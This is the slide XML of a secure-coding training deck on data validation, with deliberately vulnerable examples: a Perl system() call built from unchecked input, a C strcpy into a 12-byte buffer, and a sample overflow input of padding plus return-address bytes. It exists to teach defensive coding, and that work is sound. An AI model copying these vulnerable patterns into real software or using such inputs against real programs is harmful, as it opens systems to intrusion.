                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>zA</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>-Z\- ]+$/)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>7   {</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>8      </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>my</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> $command = "/bin/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ls</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> " . $options;</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="0" indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>9      </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>system</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>($command);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>10  }</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="14" name="Straight Connector 9"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="5400000">
              <a:off x="-632227" y="4191000"/>
              <a:ext cx="33528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88775"/>
            <a:ext cx="7884368"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Data Validation Words to Live By: #4</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Horizontal Scroll 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="179512" y="861161"/>
            <a:ext cx="58674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Validate all data lengths before writing to buffers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1238228"/>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CWE-120: Buffer Copy without Checking Size of Input (‘Classic Buffer Overflow’)</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The program copies an input buffer to an output buffer without verifying that the size of the input buffer is less than the size of the output buffer, leading to a buffer overflow. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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140482" y="624786"/>
            <a:ext cx="8153400" cy="1693653"/>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b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>1   </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>char</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> c[12];</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>2   </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>char </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>*bar;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>3   </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>printf</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"Please enter your name and press &lt;Enter&gt;\n"</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>4   get bar;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>5</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strcpy</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(c, bar);</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="8" name="Straight Connector 8"/>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14" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254782" y="2318440"/>
            <a:ext cx="7924800" cy="38179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r>
              <a:rPr lang="en-US" sz="1400" smtClean="0"/>
              <a:t>Hello </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 2" descr="File:Stack Overflow 2.png">
            <a:hlinkClick r:id="rId7"/>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1040861" y="2671408"/>
            <a:ext cx="2232015" cy="3190876"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 4" descr="File:Stack Overflow 3.png">
            <a:hlinkClick r:id="rId9"/>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3779912" y="2688034"/>
            <a:ext cx="2209800" cy="3159118"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>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140482" y="624786"/>
            <a:ext cx="8153400" cy="1693653"/>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b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>1   </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>char</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> c[12];</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>2   </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>char </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>*bar;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>3   </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>printf</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"Please enter your name and press &lt;Enter&gt;\n"</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>4   get bar;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>5</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strcpy</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(c, bar);</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="8" name="Straight Connector 8"/>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17" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254782" y="2420888"/>
            <a:ext cx="7924800" cy="38179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r>
              <a:rPr lang="pt-BR" sz="1400" smtClean="0"/>
              <a:t>A​A​A​A​A​A​A​A​A​A​A​A​A​A​A​A​A​A​A​A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0"/>
              <a:t>\x08\x35\xC0\x80 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Georgia" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 2" descr="File:Stack Overflow 2.png">
            <a:hlinkClick r:id="rId7"/>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827584" y="2751059"/>
            <a:ext cx="2232015" cy="3190876"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 8" descr="File:Stack Overflow 4.png">
            <a:hlinkClick r:id="rId9"/>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3340801" y="2767699"/>
            <a:ext cx="2667000" cy="3156213"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="488348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11556"/>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Real World Example – Buffer Overflow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="899592" y="1628800"/>
            <a:ext cx="6105525" cy="1400175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="190122" y="3278928"/>
            <a:ext cx="8267700" cy="1657350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="190122" y="5060103"/>
            <a:ext cx="2962275" cy="657225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>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0213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smtClean="0"/>
              <a:t>Data Validation Words to Live By</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107504" y="976293"/>
            <a:ext cx="7696200" cy="343292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Validate data before use in SQL Commands</a:t>
            </a:r>
          </a:p>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Validate data before sending back to the client</a:t>
            </a:r>
          </a:p>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Validate data before use in ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’ or system commands</a:t>
            </a:r>
          </a:p>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Validate all data lengths before writing to buffers</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4046" y="42263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Secure Coding …</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="914674"/>
            <a:ext cx="7696200" cy="50371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2900" indent="-342900">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>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Use "safe" functions (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>strncpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>() )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>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Validate maximum and minimum size values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>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Verify that calculations result in valid ranges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>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Validate length of input strings  (plus NULL terminator!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>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Consider compiler switches that reduce danger of buffer overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>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Whitelist when possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1779712" y="4838700"/>
            <a:ext cx="4495800" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assume all input is malicious.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="18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aphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Table 12"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1280993943"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="11208" y="476672"/>
          <a:ext cx="2438400" cy="3122022"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{073A0DAA-6AF3-43AB-8588-CEC1D06C72B9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2438400"/>
              </a:tblGrid>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Authentication</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRP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Authorization</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Session Management</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Data Validation</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Error Handling</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent2"/>
                    </a:solidFill>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Logging</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
